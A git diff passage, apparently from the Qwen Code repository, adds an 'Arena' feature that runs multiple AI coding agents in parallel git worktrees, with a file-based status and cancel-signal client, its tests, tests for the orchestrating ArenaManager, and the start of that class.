ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // Write a control signal + const controlSignal: ArenaControlSignal = { + type: 'cancel', + reason: 'Timeout', + timestamp: Date.now(), + }; + const controlPath = path.join( + tempDir, + 'control', + `${safeAgentId(agentId)}.json`, + ); + await fs.writeFile(controlPath, JSON.stringify(controlSignal), 'utf-8'); + + // First read should return the signal + const first = await reporter.checkControlSignal(); + expect(first).not.toBeNull(); + + // Second read should return null + const second = await reporter.checkControlSignal(); + expect(second).toBeNull(); + }); + }); + + describe('reportCompleted()', () => { + it('should write status with completed state and optional summary', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + await reporter.reportCompleted('Successfully implemented feature X'); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.status).toBe('completed'); + expect(content.finalSummary).toBe('Successfully implemented feature X'); + expect(content.error).toBeNull(); + }); + + it('should write status with idle state and no summary', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + await reporter.reportCompleted(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.status).toBe('completed'); + expect(content.finalSummary).toBeNull(); + expect(content.error).toBeNull(); + }); + }); + + describe('stats aggregation and wall-clock durationMs', () => { + it('should aggregate multi-model stats and use wall-clock durationMs', async () => { + 
vi.mocked(uiTelemetryService.getMetrics).mockReturnValue({ + models: { + 'model-a': { + api: { + totalRequests: 3, + totalErrors: 0, + totalLatencyMs: 1000, + }, + tokens: { + prompt: 100, + candidates: 50, + total: 150, + cached: 0, + thoughts: 0, + tool: 0, + }, + }, + 'model-b': { + api: { + totalRequests: 2, + totalErrors: 1, + totalLatencyMs: 500, + }, + tokens: { + prompt: 200, + candidates: 100, + total: 300, + cached: 0, + thoughts: 0, + tool: 0, + }, + }, + }, + tools: { + totalCalls: 10, + totalSuccess: 8, + totalFail: 2, + totalDurationMs: 2000, + totalDecisions: { + [ToolCallDecision.ACCEPT]: 0, + [ToolCallDecision.REJECT]: 0, + [ToolCallDecision.MODIFY]: 0, + [ToolCallDecision.AUTO_ACCEPT]: 0, + }, + byName: {}, + }, + files: { totalLinesAdded: 0, totalLinesRemoved: 0 }, + }); + + const reporter = new ArenaAgentClient('model-a', tempDir); + await reporter.init(); + await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId('model-a')}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.stats.rounds).toBe(5); + expect(content.stats.totalTokens).toBe(450); + expect(content.stats.inputTokens).toBe(300); + expect(content.stats.outputTokens).toBe(150); + expect(content.stats.toolCalls).toBe(10); + expect(content.stats.successfulToolCalls).toBe(8); + expect(content.stats.failedToolCalls).toBe(2); + // durationMs should be wall-clock time, not API latency sum (1500) + expect(content.stats.durationMs).toBeGreaterThanOrEqual(0); + expect(content.stats.durationMs).toBeLessThan(5000); + }); + + it('should return zeros when no models exist', async () => { + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics(), + ); + // Override with empty models + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue({ + ...createMockMetrics(), + models: {}, + }); + + const reporter = new ArenaAgentClient('model-a', tempDir); + await reporter.init(); + 
await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId('model-a')}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.stats.rounds).toBe(0); + expect(content.stats.totalTokens).toBe(0); + expect(content.stats.inputTokens).toBe(0); + expect(content.stats.outputTokens).toBe(0); + // durationMs is wall-clock, so still non-negative even with no models + expect(content.stats.durationMs).toBeGreaterThanOrEqual(0); + }); + }); + + describe('safeAgentId()', () => { + it('should pass through typical model IDs unchanged', () => { + expect(safeAgentId('qwen-coder-plus')).toBe('qwen-coder-plus'); + }); + + it('should handle IDs without unsafe characters', () => { + expect(safeAgentId('simple-id')).toBe('simple-id'); + }); + + it('should replace slashes with double dashes', () => { + expect(safeAgentId('org/model-name')).toBe('org--model-name'); + }); + + it('should handle multiple unsafe characters', () => { + expect(safeAgentId('a/b\\c:d')).toBe('a--b--c--d'); + }); + }); +}); diff --git a/packages/core/src/agents/arena/ArenaAgentClient.ts b/packages/core/src/agents/arena/ArenaAgentClient.ts new file mode 100644 index 000000000..12780f8de --- /dev/null +++ b/packages/core/src/agents/arena/ArenaAgentClient.ts @@ -0,0 +1,241 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import { isNodeError } from '../../utils/errors.js'; +import { atomicWriteJSON } from '../../utils/atomicFileWrite.js'; +import { uiTelemetryService } from '../../telemetry/uiTelemetry.js'; +import type { + ArenaAgentStats, + ArenaControlSignal, + ArenaStatusFile, +} from './types.js'; +import { safeAgentId } from './types.js'; +import { AgentStatus } from '../runtime/agent-types.js'; + +const debugLogger = 
createDebugLogger('ARENA_AGENT_CLIENT'); + +const AGENTS_SUBDIR = 'agents'; +const CONTROL_SUBDIR = 'control'; + +/** + * ArenaAgentClient is used by child agent processes to communicate + * their status back to the main ArenaManager process via file-based IPC. + * + * Status files are written to a centralized arena session directory: + * `/agents/.json` + * + * Control signals are read from: + * `/control/.json` + * + * It self-activates based on the ARENA_AGENT_ID environment variable. + * When running outside an Arena session, `ArenaAgentClient.create()` + * returns null. + */ +export class ArenaAgentClient { + private readonly agentsDir: string; + private readonly controlDir: string; + private readonly statusFilePath: string; + private readonly controlFilePath: string; + private readonly startTimeMs: number; + private initialized = false; + + /** + * Static factory - returns an instance if ARENA_AGENT_ID, ARENA_SESSION_ID, + * and ARENA_SESSION_DIR env vars are present, null otherwise. + */ + static create(): ArenaAgentClient | null { + const agentId = process.env['ARENA_AGENT_ID']; + const sessionId = process.env['ARENA_SESSION_ID']; + const sessionDir = process.env['ARENA_SESSION_DIR']; + + if (!agentId || !sessionId || !sessionDir) { + return null; + } + + return new ArenaAgentClient(agentId, sessionDir); + } + + constructor( + private readonly agentId: string, + arenaSessionDir: string, + ) { + const safe = safeAgentId(agentId); + this.agentsDir = path.join(arenaSessionDir, AGENTS_SUBDIR); + this.controlDir = path.join(arenaSessionDir, CONTROL_SUBDIR); + this.statusFilePath = path.join(this.agentsDir, `${safe}.json`); + this.controlFilePath = path.join(this.controlDir, `${safe}.json`); + this.startTimeMs = Date.now(); + } + + /** + * Initialize the agents/ and control/ directories under the arena session + * dir. Called automatically on first use if not invoked explicitly. 
+ */ + async init(): Promise { + await fs.mkdir(this.agentsDir, { recursive: true }); + await fs.mkdir(this.controlDir, { recursive: true }); + this.initialized = true; + debugLogger.info( + `ArenaAgentClient initialized for agent ${this.agentId} at ${this.agentsDir}`, + ); + } + + /** + * Write current status to the per-agent status file using atomic write + * (write to temp file then rename). + * + * Stats are derived automatically from uiTelemetryService which is the + * canonical source for token counts, tool calls, and API request counts. + */ + async updateStatus(currentActivity?: string): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.RUNNING, + updatedAt: Date.now(), + rounds: stats.rounds, + currentActivity, + stats, + finalSummary: null, + error: null, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Read and delete control.json (consume-once pattern). + * Returns null if no control signal is pending. + */ + async checkControlSignal(): Promise { + await this.ensureInitialized(); + + try { + const content = await fs.readFile(this.controlFilePath, 'utf-8'); + // Parse before deleting so a corrupted file isn't silently consumed + const signal = JSON.parse(content) as ArenaControlSignal; + await fs.unlink(this.controlFilePath); + return signal; + } catch (error: unknown) { + // File doesn't exist = no signal pending + if (isNodeError(error) && error.code === 'ENOENT') { + return null; + } + // Re-throw permission errors so they surface immediately + if (isNodeError(error) && error.code === 'EACCES') { + throw error; + } + debugLogger.error('Error reading control signal:', error); + return null; + } + } + + /** + * Report that the agent has completed the current task successfully. + * This is the primary signal to the main process that the agent is done working. 
+ */ + async reportCompleted(finalSummary?: string): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.COMPLETED, + updatedAt: Date.now(), + rounds: stats.rounds, + stats, + finalSummary: finalSummary ?? null, + error: null, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Report that the agent hit an error (API/auth/rate-limit, loop, etc.). + */ + async reportError(errorMessage: string): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.FAILED, + updatedAt: Date.now(), + rounds: stats.rounds, + stats, + finalSummary: null, + error: errorMessage, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Report that the agent's current request was cancelled by the user. + */ + async reportCancelled(): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.CANCELLED, + updatedAt: Date.now(), + rounds: stats.rounds, + stats, + finalSummary: null, + error: null, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Build ArenaAgentStats from uiTelemetryService metrics + */ + private getStatsFromTelemetry(): ArenaAgentStats { + const metrics = uiTelemetryService.getMetrics(); + + let rounds = 0; + let totalTokens = 0; + let inputTokens = 0; + let outputTokens = 0; + + for (const model of Object.values(metrics.models)) { + rounds += model.api.totalRequests; + totalTokens += model.tokens.total; + inputTokens += model.tokens.prompt; + outputTokens += model.tokens.candidates; + } + + return { + rounds, + totalTokens, + inputTokens, + outputTokens, + durationMs: Date.now() - this.startTimeMs, + toolCalls: 
metrics.tools.totalCalls, + successfulToolCalls: metrics.tools.totalSuccess, + failedToolCalls: metrics.tools.totalFail, + }; + } + + private async ensureInitialized(): Promise { + if (!this.initialized) { + await this.init(); + } + } +} diff --git a/packages/core/src/agents/arena/ArenaManager.test.ts b/packages/core/src/agents/arena/ArenaManager.test.ts new file mode 100644 index 000000000..a21f15d63 --- /dev/null +++ b/packages/core/src/agents/arena/ArenaManager.test.ts @@ -0,0 +1,505 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { ArenaManager } from './ArenaManager.js'; +import { ArenaEventType } from './arena-events.js'; +import { ArenaSessionStatus, ARENA_MAX_AGENTS } from './types.js'; + +const hoistedMockSetupWorktrees = vi.hoisted(() => vi.fn()); +const hoistedMockCleanupSession = vi.hoisted(() => vi.fn()); +const hoistedMockGetWorktreeDiff = vi.hoisted(() => vi.fn()); +const hoistedMockApplyWorktreeChanges = vi.hoisted(() => vi.fn()); +const hoistedMockDetectBackend = vi.hoisted(() => vi.fn()); + +vi.mock('../index.js', async (importOriginal) => { + const actual = await importOriginal(); + return { + ...actual, + detectBackend: hoistedMockDetectBackend, + }; +}); + +// Mock GitWorktreeService to avoid real git operations. +// The class mock includes static methods used by ArenaManager. 
+vi.mock('../../services/gitWorktreeService.js', () => { + const MockClass = vi.fn().mockImplementation(() => ({ + checkGitAvailable: vi.fn().mockResolvedValue({ available: true }), + isGitRepository: vi.fn().mockResolvedValue(true), + setupWorktrees: hoistedMockSetupWorktrees, + cleanupSession: hoistedMockCleanupSession, + getWorktreeDiff: hoistedMockGetWorktreeDiff, + applyWorktreeChanges: hoistedMockApplyWorktreeChanges, + })); + // Static methods called by ArenaManager + (MockClass as unknown as Record)['getBaseDir'] = () => + path.join(os.tmpdir(), 'arena-mock'); + (MockClass as unknown as Record)['getSessionDir'] = ( + sessionId: string, + ) => path.join(os.tmpdir(), 'arena-mock', sessionId); + (MockClass as unknown as Record)['getWorktreesDir'] = ( + sessionId: string, + ) => path.join(os.tmpdir(), 'arena-mock', sessionId, 'worktrees'); + return { GitWorktreeService: MockClass }; +}); + +// Mock the Config class +const createMockConfig = ( + workingDir: string, + arenaSettings: Record = {}, +) => ({ + getWorkingDir: () => workingDir, + getModel: () => 'test-model', + getSessionId: () => 'test-session', + getUserMemory: () => '', + getToolRegistry: () => ({ + getFunctionDeclarations: () => [], + getFunctionDeclarationsFiltered: () => [], + getTool: () => undefined, + }), + getAgentsSettings: () => ({ arena: arenaSettings }), + getUsageStatisticsEnabled: () => false, + getTelemetryEnabled: () => false, + getTelemetryLogPromptsEnabled: () => false, +}); + +describe('ArenaManager', () => { + let tempDir: string; + let mockConfig: ReturnType; + let mockBackend: ReturnType; + + beforeEach(async () => { + // Create a temp directory - no need for git repo since we mock GitWorktreeService + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), 'arena-test-')); + // Use tempDir as worktreeBaseDir to avoid slow filesystem access in deriveWorktreeDirName + mockConfig = createMockConfig(tempDir, { worktreeBaseDir: tempDir }); + + mockBackend = createMockBackend(); + 
hoistedMockDetectBackend.mockResolvedValue({ backend: mockBackend }); + + hoistedMockSetupWorktrees.mockImplementation( + async ({ + sessionId, + sourceRepoPath, + worktreeNames, + }: { + sessionId: string; + sourceRepoPath: string; + worktreeNames: string[]; + }) => { + const worktrees = worktreeNames.map((name) => ({ + id: `${sessionId}/${name}`, + name, + path: path.join(sourceRepoPath, `.arena-${sessionId}`, name), + branch: `arena/${sessionId}/${name}`, + isActive: true, + createdAt: Date.now(), + })); + + return { + success: true, + sessionId, + worktrees, + worktreesByName: Object.fromEntries( + worktrees.map((worktree) => [worktree.name, worktree]), + ), + errors: [], + }; + }, + ); + hoistedMockCleanupSession.mockResolvedValue({ + success: true, + removedWorktrees: [], + removedBranches: [], + errors: [], + }); + hoistedMockGetWorktreeDiff.mockResolvedValue(''); + hoistedMockApplyWorktreeChanges.mockResolvedValue({ success: true }); + }); + + afterEach(async () => { + try { + await fs.rm(tempDir, { recursive: true, force: true }); + } catch { + // Ignore cleanup errors + } + }); + + describe('constructor', () => { + it('should create an ArenaManager instance', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager).toBeDefined(); + expect(manager.getSessionId()).toBeUndefined(); + expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.INITIALIZING); + }); + + it('should not have a backend before start', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getBackend()).toBeNull(); + }); + }); + + describe('start validation', () => { + it('should reject start with less than 2 models', async () => { + const manager = new ArenaManager(mockConfig as never); + + await expect( + manager.start({ + models: [{ modelId: 'model-1', authType: 'openai' }], + task: 'Test task', + }), + ).rejects.toThrow('Arena requires at least 2 models'); + }); + + it('should reject start with more than max models', async () 
=> { + const manager = new ArenaManager(mockConfig as never); + + const models = Array.from({ length: ARENA_MAX_AGENTS + 1 }, (_, i) => ({ + modelId: `model-${i}`, + authType: 'openai', + })); + + await expect( + manager.start({ + models, + task: 'Test task', + }), + ).rejects.toThrow( + `Arena supports a maximum of ${ARENA_MAX_AGENTS} models`, + ); + }); + + it('should reject start with empty task', async () => { + const manager = new ArenaManager(mockConfig as never); + + await expect( + manager.start({ + models: [ + { modelId: 'model-1', authType: 'openai' }, + { modelId: 'model-2', authType: 'openai' }, + ], + task: '', + }), + ).rejects.toThrow('Arena requires a task/prompt'); + }); + + it('should reject start with duplicate model IDs', async () => { + const manager = new ArenaManager(mockConfig as never); + + await expect( + manager.start({ + models: [ + { modelId: 'model-1', authType: 'openai' }, + { modelId: 'model-1', authType: 'openai' }, + ], + task: 'Test task', + }), + ).rejects.toThrow('Arena models must have unique identifiers'); + }); + }); + + describe('event emitter', () => { + it('should return the event emitter', () => { + const manager = new ArenaManager(mockConfig as never); + const emitter = manager.getEventEmitter(); + expect(emitter).toBeDefined(); + expect(typeof emitter.on).toBe('function'); + expect(typeof emitter.off).toBe('function'); + expect(typeof emitter.emit).toBe('function'); + }); + }); + + describe('PTY interaction methods', () => { + it('should expose PTY interaction methods', () => { + const manager = new ArenaManager(mockConfig as never); + expect(typeof manager.switchToAgent).toBe('function'); + expect(typeof manager.switchToNextAgent).toBe('function'); + expect(typeof manager.switchToPreviousAgent).toBe('function'); + expect(typeof manager.getActiveAgentId).toBe('function'); + expect(typeof manager.getActiveSnapshot).toBe('function'); + expect(typeof manager.getAgentSnapshot).toBe('function'); + expect(typeof 
manager.forwardInput).toBe('function'); + expect(typeof manager.resizeAgents).toBe('function'); + }); + + it('should return null for active agent ID when no session', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getActiveAgentId()).toBeNull(); + }); + + it('should return null for active snapshot when no session', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getActiveSnapshot()).toBeNull(); + }); + }); + + describe('cancel', () => { + it('should handle cancel when no session is active', async () => { + const manager = new ArenaManager(mockConfig as never); + await expect(manager.cancel()).resolves.not.toThrow(); + }); + }); + + describe('cleanup', () => { + it('should handle cleanup when no session is active', async () => { + const manager = new ArenaManager(mockConfig as never); + await expect(manager.cleanup()).resolves.not.toThrow(); + }); + }); + + describe('getAgentStates', () => { + it('should return empty array when no agents', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getAgentStates()).toEqual([]); + }); + }); + + describe('getAgentState', () => { + it('should return undefined for non-existent agent', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getAgentState('non-existent')).toBeUndefined(); + }); + }); + + describe('applyAgentResult', () => { + it('should return error for non-existent agent', async () => { + const manager = new ArenaManager(mockConfig as never); + const result = await manager.applyAgentResult('non-existent'); + expect(result.success).toBe(false); + expect(result.error).toContain('not found'); + }); + }); + + describe('getAgentDiff', () => { + it('should return error message for non-existent agent', async () => { + const manager = new ArenaManager(mockConfig as never); + const diff = await manager.getAgentDiff('non-existent'); + expect(diff).toContain('not found'); + }); + }); + + 
describe('backend initialization', () => {
+    it('should emit SESSION_UPDATE with type warning when backend detection returns warning', async () => {
+      const manager = new ArenaManager(mockConfig as never);
+      const updates: Array<{
+        type: string;
+        message: string;
+        sessionId: string;
+      }> = [];
+      manager.getEventEmitter().on(ArenaEventType.SESSION_UPDATE, (event) => {
+        updates.push({
+          type: event.type,
+          message: event.message,
+          sessionId: event.sessionId,
+        });
+      });
+
+      hoistedMockDetectBackend.mockResolvedValueOnce({
+        backend: mockBackend,
+        warning: 'fallback to tmux backend',
+      });
+
+      await manager.start(createValidStartOptions());
+
+      expect(hoistedMockDetectBackend).toHaveBeenCalledWith(
+        undefined,
+        expect.anything(),
+      );
+      const warningUpdate = updates.find((u) => u.type === 'warning');
+      expect(warningUpdate).toBeDefined();
+      expect(warningUpdate?.message).toContain('fallback to tmux backend');
+      expect(warningUpdate?.sessionId).toBe('test-session');
+    });
+
+    it('should emit SESSION_ERROR and mark FAILED when backend init fails', async () => {
+      const manager = new ArenaManager(mockConfig as never);
+      const sessionErrors: string[] = [];
+      manager.getEventEmitter().on(ArenaEventType.SESSION_ERROR, (event) => {
+        sessionErrors.push(event.error);
+      });
+
+      mockBackend.init.mockRejectedValueOnce(new Error('init failed'));
+
+      await expect(manager.start(createValidStartOptions())).rejects.toThrow(
+        'init failed',
+      );
+      expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.FAILED);
+      expect(sessionErrors).toEqual(['init failed']);
+    });
+  });
+
+  describe('chat history forwarding', () => {
+    it('should pass chatHistory to backend spawnAgent calls', async () => {
+      const manager = new ArenaManager(mockConfig as never);
+      const chatHistory = [
+        { role: 'user' as const, parts: [{ text: 'prior question' }] },
+        { role: 'model' as const, parts: [{ text: 'prior answer' }] },
+      ];
+
+      await manager.start({
+        ...createValidStartOptions(),
+
chatHistory,
+      });
+
+      // Both agents should have been spawned with chatHistory in
+      // the inProcess config.
+      expect(mockBackend.spawnAgent).toHaveBeenCalledTimes(2);
+      for (const call of mockBackend.spawnAgent.mock.calls) {
+        const spawnConfig = call[0] as {
+          inProcess?: { chatHistory?: unknown };
+        };
+        expect(spawnConfig.inProcess?.chatHistory).toEqual(chatHistory);
+      }
+    });
+
+    it('should pass undefined chatHistory when not provided', async () => {
+      const manager = new ArenaManager(mockConfig as never);
+
+      await manager.start(createValidStartOptions());
+
+      expect(mockBackend.spawnAgent).toHaveBeenCalledTimes(2);
+      for (const call of mockBackend.spawnAgent.mock.calls) {
+        const spawnConfig = call[0] as {
+          inProcess?: { chatHistory?: unknown };
+        };
+        expect(spawnConfig.inProcess?.chatHistory).toBeUndefined();
+      }
+    });
+  });
+
+  describe('active session lifecycle', () => {
+    it('cancel should stop backend and move session to CANCELLED', async () => {
+      const manager = new ArenaManager(mockConfig as never);
+
+      // Disable auto-exit so agents stay running until we cancel.
+      mockBackend.setAutoExit(false);
+
+      const startPromise = manager.start({
+        ...createValidStartOptions(),
+        timeoutSeconds: 30,
+      });
+
+      // Wait until the backend has spawned all agents.
+      // (Agents are spawned sequentially; cancelling between spawns would
+      // cause spawnAgentPty to overwrite the CANCELLED status back to RUNNING.)
+      await waitForCondition(
+        () => mockBackend.spawnAgent.mock.calls.length >= 2,
+      );
+
+      await manager.cancel();
+      expect(mockBackend.stopAll).toHaveBeenCalledTimes(1);
+      expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.CANCELLED);
+
+      await startPromise;
+      expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.CANCELLED);
+    });
+
+    it('cleanup should release backend and worktree resources after start', async () => {
+      const manager = new ArenaManager(mockConfig as never);
+
+      // auto-exit is on by default, so agents terminate quickly.
+      await manager.start(createValidStartOptions());
+
+      await manager.cleanup();
+
+      expect(mockBackend.cleanup).toHaveBeenCalledTimes(1);
+      // cleanupSession is called with worktreeDirName (short ID), not the full sessionId.
+      // For 'test-session', the short ID is 'testsess' (first 8 chars with dashes removed).
+      expect(hoistedMockCleanupSession).toHaveBeenCalledWith('testsess');
+      expect(manager.getBackend()).toBeNull();
+      expect(manager.getSessionId()).toBeUndefined();
+    });
+  });
+});
+
+describe('ARENA_MAX_AGENTS', () => {
+  it('should be 5', () => {
+    expect(ARENA_MAX_AGENTS).toBe(5);
+  });
+});
+
+/**
+ * Build a mock backend whose methods are vitest spies.
+ *
+ * While auto-exit is enabled (the default), every spawnAgent() call schedules
+ * the registered exit callback for that agent ~5ms later with exit code 0.
+ * Call setAutoExit(false) to keep agents "running" until the test acts.
+ */
+function createMockBackend() {
+  type ExitCb = (
+    agentId: string,
+    exitCode: number | null,
+    signal: number | null,
+  ) => void;
+  let onAgentExit: ExitCb | null = null;
+  let autoExit = true;
+
+  const backend = {
+    type: 'tmux' as const,
+    init: vi.fn().mockResolvedValue(undefined),
+    spawnAgent: vi.fn(async (config: { agentId: string }) => {
+      // By default, simulate immediate agent termination so tests
+      // don't hang in waitForAllAgentsSettled.
+      if (autoExit) {
+        setTimeout(() => onAgentExit?.(config.agentId, 0, null), 5);
+      }
+    }),
+    stopAgent: vi.fn(),
+    stopAll: vi.fn(),
+    cleanup: vi.fn().mockResolvedValue(undefined),
+    setOnAgentExit: vi.fn((cb: ExitCb) => {
+      onAgentExit = cb;
+    }),
+    waitForAll: vi.fn().mockResolvedValue(true),
+    switchTo: vi.fn(),
+    switchToNext: vi.fn(),
+    switchToPrevious: vi.fn(),
+    getActiveAgentId: vi.fn().mockReturnValue(null),
+    getActiveSnapshot: vi.fn().mockReturnValue(null),
+    getAgentSnapshot: vi.fn().mockReturnValue(null),
+    getAgentScrollbackLength: vi.fn().mockReturnValue(0),
+    forwardInput: vi.fn().mockReturnValue(false),
+    writeToAgent: vi.fn().mockReturnValue(false),
+    resizeAll: vi.fn(),
+    getAttachHint: vi.fn().mockReturnValue(null),
+    /** Disable automatic agent exit for tests that need to control timing.
*/
+    setAutoExit(value: boolean) {
+      autoExit = value;
+    },
+  };
+  return backend;
+}
+
+/** Minimal start options that pass validation: two distinct models and a task. */
+function createValidStartOptions() {
+  return {
+    models: [
+      { modelId: 'model-1', authType: 'openai' },
+      { modelId: 'model-2', authType: 'openai' },
+    ],
+    task: 'Implement feature X',
+  };
+}
+
+/**
+ * Yield one turn of the event loop.
+ *
+ * Despite the name this schedules a macrotask (setImmediate / setTimeout),
+ * not a microtask, so timers and I/O callbacks get a chance to run.
+ */
+async function waitForMicrotask(): Promise<void> {
+  // Use setImmediate (or setTimeout fallback) to yield to the event loop
+  // and allow other async operations (like the start() method) to progress.
+  await new Promise<void>((resolve) => {
+    if (typeof setImmediate === 'function') {
+      setImmediate(resolve);
+    } else {
+      setTimeout(resolve, 0);
+    }
+  });
+}
+
+/**
+ * Poll `predicate` once per event-loop turn until it returns true.
+ *
+ * @throws Error when `timeoutMs` elapses before the predicate holds.
+ */
+async function waitForCondition(
+  predicate: () => boolean,
+  timeoutMs = 1000,
+): Promise<void> {
+  const startedAt = Date.now();
+  while (!predicate()) {
+    if (Date.now() - startedAt > timeoutMs) {
+      throw new Error('Timed out while waiting for condition');
+    }
+    await waitForMicrotask();
+  }
+}
diff --git a/packages/core/src/agents/arena/ArenaManager.ts b/packages/core/src/agents/arena/ArenaManager.ts
new file mode 100644
index 000000000..6a386158f
--- /dev/null
+++ b/packages/core/src/agents/arena/ArenaManager.ts
@@ -0,0 +1,1648 @@
+/**
+ * @license
+ * Copyright 2025 Qwen Team
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+import * as fs from 'node:fs/promises';
+import * as path from 'node:path';
+import { GitWorktreeService } from '../../services/gitWorktreeService.js';
+import { Storage } from '../../config/storage.js';
+import type { Config } from '../../config/config.js';
+import { getCoreSystemPrompt } from '../../core/prompts.js';
+import { createDebugLogger } from '../../utils/debugLogger.js';
+import { isNodeError } from '../../utils/errors.js';
+import { atomicWriteJSON } from '../../utils/atomicFileWrite.js';
+import type { AnsiOutput } from '../../utils/terminalSerializer.js';
+import { ArenaEventEmitter, ArenaEventType } from './arena-events.js';
+import type { AgentSpawnConfig, Backend, DisplayMode } from '../index.js';
+import { detectBackend, DISPLAY_MODE } from '../index.js';
+import type { InProcessBackend } from '../backends/InProcessBackend.js';
+import {
+  AgentEventType,
+  type AgentStatusChangeEvent,
+} from '../runtime/agent-events.js';
+import {
+  type ArenaConfig,
+  type ArenaConfigFile,
+  type ArenaControlSignal,
+  type ArenaStartOptions,
+  type ArenaAgentResult,
+  type ArenaSessionResult,
+  type ArenaAgentState,
+  type ArenaCallbacks,
+  type ArenaStatusFile,
+  ArenaSessionStatus,
+  ARENA_MAX_AGENTS,
+  safeAgentId,
+} from './types.js';
+import {
+  AgentStatus,
+  isTerminalStatus,
+  isSettledStatus,
+  isSuccessStatus,
+} from '../runtime/agent-types.js';
+import {
+  logArenaSessionStarted,
+  logArenaAgentCompleted,
+  logArenaSessionEnded,
+  makeArenaSessionStartedEvent,
+  makeArenaAgentCompletedEvent,
+  makeArenaSessionEndedEvent,
+} from '../../telemetry/index.js';
+import type { ArenaSessionEndedStatus } from '../../telemetry/index.js';
+
+const debugLogger = createDebugLogger('ARENA');
+
+const ARENA_POLL_INTERVAL_MS = 500;
+
+/**
+ * ArenaManager orchestrates multi-model competitive execution.
+ *
+ * It manages:
+ * - Git worktree creation for isolated environments
+ * - Parallel agent execution via PTY subprocesses (through Backend)
+ * - Event emission for UI updates
+ * - Result collection and comparison
+ * - Active agent switching, input routing, and screen capture
+ */
+export class ArenaManager {
+  private readonly config: Config;
+  private readonly eventEmitter: ArenaEventEmitter;
+  private readonly worktreeService: GitWorktreeService;
+  private readonly arenaBaseDir: string;
+  private readonly callbacks: ArenaCallbacks;
+  private backend: Backend | null = null;
+  private cachedResult: ArenaSessionResult | null = null;
+
+  private sessionId: string | undefined;
+  /** Short directory name used for worktree paths (derived from sessionId).
*/
+  private worktreeDirName: string | undefined;
+  private sessionStatus: ArenaSessionStatus = ArenaSessionStatus.INITIALIZING;
+  /** Per-agent state, keyed by agent ID. */
+  private agents: Map<string, ArenaAgentState> = new Map();
+  private arenaConfig: ArenaConfig | undefined;
+
+  private startedAt: number | undefined;
+  private masterAbortController: AbortController | undefined;
+  private terminalCols: number;
+  private terminalRows: number;
+  private pollingInterval: ReturnType<typeof setInterval> | null = null;
+  /** Only ever awaited, so the resolved value type is irrelevant. */
+  private lifecyclePromise: Promise<unknown> | null = null;
+  /** Cleanup functions for in-process event bridge listeners. */
+  private eventBridgeCleanups: Array<() => void> = [];
+  /** Guard to prevent double-emitting the session-ended telemetry event. */
+  private sessionEndedLogged = false;
+
+  /**
+   * @param config - Provides the working directory, session ID and
+   *   agents/arena settings.
+   * @param callbacks - Optional lifecycle callbacks; defaults to none.
+   */
+  constructor(config: Config, callbacks: ArenaCallbacks = {}) {
+    this.config = config;
+    this.callbacks = callbacks;
+    this.eventEmitter = new ArenaEventEmitter();
+    const arenaSettings = config.getAgentsSettings().arena;
+    // Use the user-configured base dir, or default to ~/.qwen/arena.
+    this.arenaBaseDir =
+      arenaSettings?.worktreeBaseDir ??
+      path.join(Storage.getGlobalQwenDir(), 'arena');
+    this.worktreeService = new GitWorktreeService(
+      config.getWorkingDir(),
+      this.arenaBaseDir,
+    );
+    // Fall back to 120x40 when stdout reports no size (e.g. not a TTY).
+    this.terminalCols = process.stdout.columns || 120;
+    this.terminalRows = process.stdout.rows || 40;
+  }
+
+  // ─── Public API ────────────────────────────────────────────────
+
+  /**
+   * Get the event emitter for subscribing to Arena events.
+   */
+  getEventEmitter(): ArenaEventEmitter {
+    return this.eventEmitter;
+  }
+
+  /**
+   * Get the current session ID.
+   */
+  getSessionId(): string | undefined {
+    return this.sessionId;
+  }
+
